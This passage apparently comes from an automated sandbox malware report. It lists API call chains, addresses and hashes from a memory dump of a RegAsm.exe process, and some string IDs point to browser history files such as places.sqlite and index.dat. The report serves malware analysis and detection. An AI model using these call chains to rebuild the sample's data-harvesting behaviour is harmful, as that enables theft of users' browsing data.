                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1979745280-0
                                                                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                            • memset.MSVCRT ref: 00403A55
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                            • String ID: history.dat$places.sqlite
                                                                                                                            • API String ID: 2641622041-467022611
                                                                                                                            • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                            • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$File$PointerRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 839530781-0
                                                                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFindFirst
                                                                                                                            • String ID: *.*$index.dat
                                                                                                                            • API String ID: 1974802433-2863569691
                                                                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                            APIs
                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$FilePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156039329-0
                                                                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3397143404-0
                                                                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                            APIs
                                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                            • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1125800050-0
                                                                                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleSleep
                                                                                                                            • String ID: }A
                                                                                                                            • API String ID: 252777609-2138825249
                                                                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                            APIs
                                                                                                                            • malloc.MSVCRT ref: 00409A10
                                                                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                            • free.MSVCRT ref: 00409A31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: freemallocmemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3056473165-0
                                                                                                                            • Opcode ID: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                                                                                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                            • Opcode Fuzzy Hash: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                                                                                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset
                                                                                                                            • String ID: BINARY
                                                                                                                            • API String ID: 2221118986-907554435
                                                                                                                            • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                            • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                            • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                            • _mbscat.MSVCRT ref: 0040525B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 568699880-0
                                                                                                                            • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                            • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                            • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                            • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsicmp
                                                                                                                            • String ID: /stext
                                                                                                                            • API String ID: 2081463915-3817206916
                                                                                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1023896661-0
                                                                                                                            • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                            • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                            • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                            • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2445788494-0
                                                                                                                            • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                            • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcmpmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1065087418-0
                                                                                                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1381354015-0
                                                                                                                            • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                            • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                            • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                            • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                            • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                              • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2154303073-0
                                                                                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                            APIs
                                                                                                                            • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$PointerRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3154509469-0
                                                                                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                            APIs
                                                                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4232544981-0
                                                                                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3664257935-0
                                                                                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                            APIs
                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileModuleName
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 514040917-0
                                                                                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                            APIs
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                            Memory Dump Source
